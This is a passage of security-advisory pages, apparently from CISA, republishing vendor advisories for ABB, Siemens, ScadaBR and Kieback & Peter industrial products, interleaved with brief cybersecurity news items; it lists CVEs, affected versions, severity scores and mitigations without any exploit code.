component - The vulnerabilities exist in the Preboot eXecution Environment (PXE) of the UEFI firmware. If this functionality is not needed, it is recommended to disable it in the UEFI settings, thus making the vulnerabilities not exploitable. Limit accessibility - If PXE functionality is required, users should tightly restrict network traffic to legitimate users and block illegitimate PXE traffic, specifically related to IPv6. For instance, by blocking IPv6 network traffic on the control network firewall. https://help.br-automation.com/#/en/6/cyber-security/defense-in-depth-for-br-products/reference_architecture.html Refer to section “General security recommendations” for further advise on how to keep your system secure. Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.3 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H/E:P/RL:O/RC:C CVE-2023-45235 EDK2's Network Package is susceptible to a buffer overflow vulnerability when handling Server ID option from a DHCPv6 proxy Advertise message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality, Integrity and/or Availability. View CVE Details Affected Products ABB B&R PCs Vendor: ABB Product Version: ABB APC4100 <1.09, ABB APC910 <=1.25, ABB C80 <1.14, ABB MPC3100 <1.24, ABB PPC1200 <1.14, ABB PPC900 <2.16, ABB APC2200 <1.35, ABB PPC2200 <1.35, ABB APC3100 <1.45, ABB PPC3100 <1.45 Product Status: fixed, known_affected Remediations Vendor fix The problems are corrected in the following product versions: - APC4100 1.09 - APC910 No patch will be released (Please refer to the mitigation measures specified in this advisory). - C80 1.14 - MPC3100 1.24 - PPC1200 1.14 - PPC900 2.16 - APC2200 1.35 - PPC2200 1.35 - APC3100 1.45 - PPC3100 1.45 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Deactivate the vulnerable component - The vulnerabilities exist in the Preboot eXecution Environment (PXE) of the UEFI firmware. If this functionality is not needed, it is recommended to disable it in the UEFI settings, thus making the vulnerabilities not exploitable. Limit accessibility - If PXE functionality is required, users should tightly restrict network traffic to legitimate users and block illegitimate PXE traffic, specifically related to IPv6. For instance, by blocking IPv6 network traffic on the control network firewall. https://help.br-automation.com/#/en/6/cyber-security/defense-in-depth-for-br-products/reference_architecture.html Refer to section “General security recommendations” for further advise on how to keep your system secure. Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.3 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H/E:P/RL:O/RC:C CVE-2023-45236 EDK2's Network Package is susceptible to a predictable TCP Initial Sequence Number. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality. View CVE Details Affected Products ABB B&R PCs Vendor: ABB Product Version: ABB APC4100 <1.09, ABB APC910 <=1.25, ABB C80 <1.14, ABB MPC3100 <1.24, ABB PPC1200 <1.14, ABB PPC900 <2.16, ABB APC2200 <1.35, ABB PPC2200 <1.35, ABB APC3100 <1.45, ABB PPC3100 <1.45 Product Status: fixed, known_affected Remediations Vendor fix The problems are corrected in the following product versions: - APC4100 1.09 - APC910 No patch will be released (Please refer to the mitigation measures specified in this advisory). - C80 1.14 - MPC3100 1.24 - PPC1200 1.14 - PPC900 2.16 - APC2200 1.35 - PPC2200 1.35 - APC3100 1.45 - PPC3100 1.45 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Deactivate the vulnerable component - The vulnerabilities exist in the Preboot eXecution Environment (PXE) of the UEFI firmware. If this functionality is not needed, it is recommended to disable it in the UEFI settings, thus making the vulnerabilities not exploitable. Limit accessibility - If PXE functionality is required, users should tightly restrict network traffic to legitimate users and block illegitimate PXE traffic, specifically related to IPv6. For instance, by blocking IPv6 network traffic on the control network firewall. https://help.br-automation.com/#/en/6/cyber-security/defense-in-depth-for-br-products/reference_architecture.html Refer to section “General security recommendations” for further advise on how to keep your system secure. Relevant CWE: CWE-338 Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N/E:P/RL:O/RC:C CVE-2023-45237 EDK2's Network Package is susceptible to a predictable TCP Initial Sequence Number. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality. View CVE Details Affected Products ABB B&R PCs Vendor: ABB Product Version: ABB APC4100 <1.09, ABB APC910 <=1.25, ABB C80 <1.14, ABB MPC3100 <1.24, ABB PPC1200 <1.14, ABB PPC900 <2.16, ABB APC2200 <1.35, ABB PPC2200 <1.35, ABB APC3100 <1.45, ABB PPC3100 <1.45 Product Status: fixed, known_affected Remediations Vendor fix The problems are corrected in the following product versions: - APC4100 1.09 - APC910 No patch will be released (Please refer to the mitigation measures specified in this advisory). - C80 1.14 - MPC3100 1.24 - PPC1200 1.14 - PPC900 2.16 - APC2200 1.35 - PPC2200 1.35 - APC3100 1.45 - PPC3100 1.45 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Deactivate the vulnerable component - The vulnerabilities exist in the Preboot eXecution Environment (PXE) of the UEFI firmware. If this functionality is not needed, it is recommended to disable it in the UEFI settings, thus making the vulnerabilities not exploitable. Limit accessibility - If PXE functionality is required, users should tightly restrict network traffic to legitimate users and block illegitimate PXE traffic, specifically related to IPv6. For instance, by blocking IPv6 network traffic on the control network firewall. https://help.br-automation.com/#/en/6/cyber-security/defense-in-depth-for-br-products/reference_architecture.html Refer to section “General security recommendations” for further advise on how to keep your system secure. Relevant CWE: CWE-338 Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C Acknowledgments ABB PSIRT reported these vulnerabilities to CISA. Notice The information in this document is subject to change without notice, and should not be construed as a commitment by B&R. B&R provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall B&R or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if B&R or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from B&R, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Frequently Asked Questions What is the scope of the vulnerabilities? - A network attacker who successfully exploited these vulnerabilities to execute remote code, initiate DoS attacks, conduct DNS cache poisoning, or extract sensitive information. In worst case, these vulnerabilities can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality, Integrity and/or Availability. What causes the vulnerabilities? - The vulnerabilities are caused by usage of vulnerable UEFI firmware in some B&R xPCs. What is a B&R xPC? - A B&R xPC is an industrial PC (IPC) designed for use in industrial environments and is built to handle more demanding conditions than a standard PC. They often feature robust construction, resistance to dust and moisture, extended temperature ranges, and other specifications suited for industrial applications. What might an attacker use the vulnerabilities to do? - A network attacker who successfully exploited the vulnerabilities could execute remote code, initiate DoS attacks, conduct DNS cache poisoning, or extract sensitive information. How could an attacker exploit the vulnerabilities? - An attacker could try to exploit the vulnerabilities by creating a specially crafted message and sending the message to an affected system node. This would require that the attacker has access to the system network, by connecting to the network either directly or through a wrongly configured or penetrated firewall, or that he installs malicious software on a system node or otherwise infects the network with malicious software. Recommended practices help mitigate such attacks, see section Mitigating Factors above. Could the vulnerabilities be exploited remotely? - Yes, an attacker who has network access to an affected system node could exploit this vulnerability. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed. What does the update do? - The update removes the vulnerabilities in the TCP/IP stack used by the UEFI firmware. When this security advisory was issued, had these vulnerabilities been publicly disclosed? - Yes, these vulnerabilities have been publicly disclosed. When this security advisory was issued, had B&R received any reports that this vulnerability was being exploited on B&R products? - No, B&R had not received any information indicating that this vulnerability had been exploited on B&R products when this security advisory was originally issued. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT SA24P003 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-01-29 Date Revision Summary 2026-01-29 1 Initial version. 2026-05-21 2 Initial CISA Republication of ABB PSIRT SA24P003 advisory Legal Notice and Terms of Use

On Wednesday, Microsoft started rolling out security patches for two Defender vulnerabilities that have been exploited in zero-day attacks. [...]

GitHub says the hackers who breached 3,800 internal repositories gained access via a malicious version of the Nx Console VS Code extension, compromised in last week's TanStack npm supply-chain attack. [...]

The attacker tricked the Butter Network cross-chain bridge into minting millions more tokens than the legitimate supply of MAPO.

The Ukrainian cyberpolice, working in conjunction with U.S. law enforcement, has identified an 18-year-old man from Odesa suspected of running an infostealer malware operation targeting users of an online store in California. [...]

Threat actors brute-forced VPN credentials and bypassed multi-factor authentication (MFA) on SonicWall Gen6 SSL-VPN appliances to deploy tools used in ransomware attacks. [...]

GitHub confirmed a data breach this week involving the theft of thousands of developer code repositories. One threat actor — TeamPCP — took credit.

In spite of state laws meant to improve cyber hygiene, an analysis of incidents shows issues persist and visibility falls short.

An unauthenticated attacker can exploit the command injection vulnerability to gain remote access to robotic systems, causing significant disruption to the environment.

The Grafana data breach was caused by a single GitHub workflow token that slipped through the rotation process following the TanStack npm supply-chain attack last week. [...]

Identity checks alone can't stop attackers using stolen session tokens and compromised devices. Specops Software outlines why Zero Trust strategies increasingly depend on continuous device verification. [...]

Drupal has announced a "core security release" scheduled for later today, warning that threat actors might develop exploits within hours of the update disclosure. [...]

CISA has added seven new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2008-4250 Microsoft Windows Buffer Overflow Vulnerability CVE-2009-1537 Microsoft DirectX NULL Byte Overwrite Vulnerability CVE-2009-3459 Adobe Acrobat and Reader Heap-Based Buffer Overflow Vulnerability CVE-2010-0249 Microsoft Internet Explorer Use-After-Free Vulnerability CVE-2010-0806 Microsoft Internet Explorer Use-After-Free Vulnerability CVE-2026-41091 Microsoft Defender Elevation of Privilege Vulnerability CVE-2026-45498 Microsoft Defender Denial of Service Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

PinTheft, a recently patched Linux privilege escalation vulnerability, now has a publicly available proof-of-concept (PoC) exploit that allows local attackers to gain root privileges on Arch Linux systems. [...]

GitHub has confirmed that roughly 3,800 internal repositories were breached after one of its employees installed a malicious VS Code extension. [...]

Multiple vulnerabilities have been discovered in Mozilla products, the most severe of which could allow for arbitrary code execution.  Mozilla Firefox is a web browser used to access the Internet. Mozilla Firefox ESR is a version of the web browser intended to be deployed in large organizations. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Verizon's 2026 Data Breach Investigations Report (DBIR) finds that exploits are now involved in 31% of initial access for breaches, while patching lags too far behind the bad guys.

Dark Reading editors reflect on two decades of dramatic change — from perimeter defense to assume-breach strategies — and warn that while AI, cloud, and COVID-19 have transformed the threat landscape, organizations are still failing at fundamental security hygiene that could stop sophisticated attacks in their tracks.

View CSAF Summary A buffer overflow vulnerability in the User-ID™ Authentication Portal (aka Captive Portal) service of Palo Alto Networks PAN-OS software allows an unauthenticated attacker to execute arbitrary code with root privileges on the PA-Series and VM-Series firewalls by sending specially crafted packets. Siemens is preparing fix versions and recommends countermeasures for products where fixes are not, or not yet available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications. [1] https://security.paloaltonetworks.com/ The following versions of Siemens RUGGEDCOM APE1808 Devices are affected: RUGGEDCOM APE1808 vers:all/* (CVE-2026-0300) CVSS Vendor Equipment Vulnerabilities v3 10 Siemens Siemens RUGGEDCOM APE1808 Devices Out-of-bounds Write Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2026-0300 A buffer overflow vulnerability in the User-ID™ Authentication Portal (aka Captive Portal) service of Palo Alto Networks PAN-OS software allows an unauthenticated attacker to execute arbitrary code with root privileges on the PA-Series and VM-Series firewalls by sending specially crafted packets. View CVE Details Affected Products Siemens RUGGEDCOM APE1808 Devices Vendor: Siemens Product Version: RUGGEDCOM APE1808 Product Status: known_affected Remediations Mitigation Disable Response Pages in the Interface Management Profile attached to every L3 interface in any zone where untrusted/internet traffic can ingress. Keep Response Pages enabled only on interfaces in trust/internal zones where legitimate users' browsers ingress Mitigation Disable User-ID™ Authentication Portal if not required Mitigation Restrict access to the User-ID Authentication Portal to trusted internal IP addresses only Vendor fix Contact customer support to receive patch and update information Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 10 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H Acknowledgments Siemens ProductCERT reported this vulnerability to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-967325 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-19 2 Initial CISA Republication of Siemens ProductCERT SSA-967325 advisory Legal Notice and Terms of Use

View CSAF Summary An update is available that resolves vulnerability in the product versions listed as affected in this advisory. A path traversal vulnerability in these products can allow unauthenticated users to gain access to restricted directories. Exploiting this vulnerability can lead to complete system compromise and exposure of sensitive information. The following versions of ABB CoreSense HM and CoreSense M10 are affected: CoreSense™ HM <=2.3.1, 2.3.4 (CVE-2025-3465) CoreSense™ M10 <=1.4.1.12, 1.4.1.31 (CVE-2025-3465) CVSS Vendor Equipment Vulnerabilities v3 7.1 ABB ABB CoreSense HM and CoreSense M10 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Background Critical Infrastructure Sectors: Food and Agriculture, Commercial Facilities, Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2025-3465 A path traversal vulnerability in these products can allow unauthenticated users to gain access to restricted directories. Exploiting this vulnerability can lead to complete system compromise and exposure of sensitive information. View CVE Details Affected Products ABB CoreSense HM and CoreSense M10 Vendor: ABB Product Version: CoreSense™ HM<=2.3.1, CoreSense™ M10<=1.4.1.12 Product Status: fixed, known_affected Remediations Vendor fix The vulnerabilities are corrected in the following version: CoreSense™ HM v2.3.4 & CoreSense™ M10 v1.4.1.31 ABB recommends that customers apply the update at the earliest convenience. Relevant CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N Acknowledgments ABB reported this vulnerability to CISA. Notice The information in this document is subject to change without notice and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damage of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damage. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Mitigating factors The path traversal vulnerability is only exploitable when the attacker has local access to the machine hosting the web application (i.e., access to localhost). To mitigate this vulnerability, the affected products should be configured to restrict local access to authorized users only, ensuring that untrusted users cannot interact with the application directly on the host system. ABB has restricted file downloads to a specific directory designated solely for downloadable content. Strict input validation and path sanitization are implemented to ensure that only legitimate file paths within this directory can be accessed. Refer to section “General Security Recommendations” for further advise on how to keep your system secure. Frequently Asked Questions What causes the vulnerability? The vulnerability is caused by unchecked input data in the file parameter in the CoreSense products. What might an attacker use the vulnerability to do? An attacker who successfully exploited this vulnerability can allow unauthenticated users to gain access to restricted directories and can lead to complete system compromise and exposure of sensitive information. How could an attacker exploit the vulnerability? Path traversal would require that the attacker has access to the system local network, by connecting to the system directly or through a wrongly configured or penetrated firewall, or that he installs malicious software on a system node or otherwise infects the network with malicious software. Recommended practices help mitigate such attacks, see mitigating factors section. Could the vulnerability be exploited remotely? No. Can functional safety be affected by an exploit of this vulnerability? No. What does the update do? The update removes the vulnerability by modifying the way that the file parameter validates and verifies input data. When this security advisory was issued, had this vulnerability been publicly disclosed? No, ABB received information about this vulnerability through responsible disclosure. When this security advisory was issued, had ABB received any reports that this vulnerability was being exploited? No, ABB had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as virtual private networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB 3KXG200000R4801 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB directly for any questions regarding this advisory. Revision History Initial Release Date: 2025-04-16 Date Revision Summary 2025-04-16 1 Initial version. 2025-09-30 2 Addressed comments. 2025-10-07 3 Fixed incorrect links. 2025-10-20 4 Final version with corrected dates. 2026-05-19 5 Initial CISA Republication of ABB 3KXG200000R4801 advisory Legal Notice and Terms of Use

View CSAF Summary Successful exploitation of these vulnerabilities could allow an attacker to perform unauthenticated remote code execution. The following versions of ScadaBR are affected: ScadaBR 1.2.0 (CVE-2026-8602, CVE-2026-8603, CVE-2026-8604, CVE-2026-8605) CVSS Vendor Equipment Vulnerabilities v3 9.1 ScadaBR ScadaBR Missing Authentication for Critical Function, Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), Cross-Site Request Forgery (CSRF), Use of Hard-coded Credentials Background Critical Infrastructure Sectors: Critical Manufacturing, Dams, Chemical, Energy, Water and Wastewater Countries/Areas Deployed: Worldwide Company Headquarters Location: Brazil Vulnerabilities Expand All + CVE-2026-8602 In ScadaBR version 1.2.0, a Missing Authentication for Critical Function vulnerability could allow an unauthenticated attacker to send a HTTP GET requests to the SCADA system and inject arbitrary sensor readings. View CVE Details Affected Products ScadaBR Vendor: ScadaBR Product Version: ScadaBR ScadaBR: 1.2.0 Product Status: known_affected Remediations Vendor fix ScadaBR has not responded to requests to work with CISA to mitigate this vulnerability. Users of affected versions of ScadaBR are invited to contact ScadaBR customer support for additional information https://github.com/ScadaBR. https://github.com/ScadaBR Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H CVE-2026-8603 In ScadaBR version 1.2.0, an OS Command Injection vulnerability could allow an attacker to execute commands as root on the SCADA system. View CVE Details Affected Products ScadaBR Vendor: ScadaBR Product Version: ScadaBR ScadaBR: 1.2.0 Product Status: known_affected Remediations Vendor fix ScadaBR has not responded to requests to work with CISA to mitigate this vulnerability. Users of affected versions of ScadaBR are invited to contact ScadaBR customer support for additional information https://github.com/ScadaBR. https://github.com/ScadaBR Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2026-8604 In ScadaBR version 1.2.0, a CSRF vulnerability could allow an attacker to trigger any authenticated action through a victim's session by luring any logged-in user to a malicious webpage. View CVE Details Affected Products ScadaBR Vendor: ScadaBR Product Version: ScadaBR ScadaBR: 1.2.0 Product Status: known_affected Remediations Vendor fix ScadaBR has not responded to requests to work with CISA to mitigate this vulnerability. Users of affected versions of ScadaBR are invited to contact ScadaBR customer support for additional information https://github.com/ScadaBR. https://github.com/ScadaBR Relevant CWE: CWE-352 Cross-Site Request Forgery (CSRF) Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2026-8605 In ScadaBR version 1.2.0, a Use of Hard-Coded Credentials vulnerability could allow an attacker to access the SCADA system as admin. View CVE Details Affected Products ScadaBR Vendor: ScadaBR Product Version: ScadaBR ScadaBR: 1.2.0 Product Status: known_affected Remediations Vendor fix ScadaBR has not responded to requests to work with CISA to mitigate this vulnerability. Users of affected versions of ScadaBR are invited to contact ScadaBR customer support for additional information https://github.com/ScadaBR. https://github.com/ScadaBR Relevant CWE: CWE-798 Use of Hard-coded Credentials Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Acknowledgments Arad Inbar, Nir Somech, Ben Grinberg, Daniel Lubel, Erez Cohen, and Adiel Sol of DREAM reported these vulnerabilities to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. Revision History Initial Release Date: 2026-05-19 Date Revision Summary 2026-05-19 1 Initial Publication Legal Notice and Terms of Use

View CSAF Summary Successful exploitation of this vulnerability could allow an attacker to take control of the victim's browser. The following versions of Kieback & Peter DDC Building Controllers are affected: DDC4002 <=1.12.14 (CVE-2026-4293) DDC4100 <=1.12.14 (CVE-2026-4293) DDC4200 <=1.12.14 (CVE-2026-4293) DDC4200-L <=1.12.14 (CVE-2026-4293) DDC4400 <=1.12.14 (CVE-2026-4293) DDC4002e <=1.23.4 (CVE-2026-4293) DDC4200e <=1.23.4 (CVE-2026-4293) DDC4400e <=1.23.4 (CVE-2026-4293) DDC4020e <=1.23.4 (CVE-2026-4293) DDC4040e <=1.23.4 (CVE-2026-4293) DDC520 <=1.24.1 (CVE-2026-4293) CVSS Vendor Equipment Vulnerabilities v3 5.3 Kieback & Peter Kieback & Peter DDC Building Controllers Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Background Critical Infrastructure Sectors: Commercial Facilities, Communications, Financial Services, Food and Agriculture, Government Services and Facilities, Healthcare and Public Health, Information Technology Countries/Areas Deployed: Austria, China, France, Germany, United Arab Emirates Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2026-4293 The affected products are vulnerable to cross-site scripting (XSS), enabling JavaScript to be executed by the victim's browser, which allows the attacker to control the browser. View CVE Details Affected Products Kieback & Peter DDC Building Controllers Vendor: Kieback & Peter Product Version: Kieback & Peter DDC4002: <=1.12.14, Kieback & Peter DDC4100: <=1.12.14, Kieback & Peter DDC4200: <=1.12.14, Kieback & Peter DDC4200-L: <=1.12.14, Kieback & Peter DDC4400: <=1.12.14, Kieback & Peter DDC4002e: <=1.23.4, Kieback & Peter DDC4200e: <=1.23.4, Kieback & Peter DDC4400e: <=1.23.4, Kieback & Peter DDC4020e: <=1.23.4, Kieback & Peter DDC4040e: <=1.23.4, Kieback & Peter DDC520: <=1.24.1 Product Status: known_affected Remediations Mitigation Kieback & Peter DDC Building Controllers are developed and designed for use in closed building automation networks. The system is protected by a multi-level perimeter against attacks, especially from outside, by dividing it into operational technology (OT) zones with firewalls. Building automation systems (BA systems) in general should not be directly accessible from untrusted networks, especially from the Internet, but should be protected by 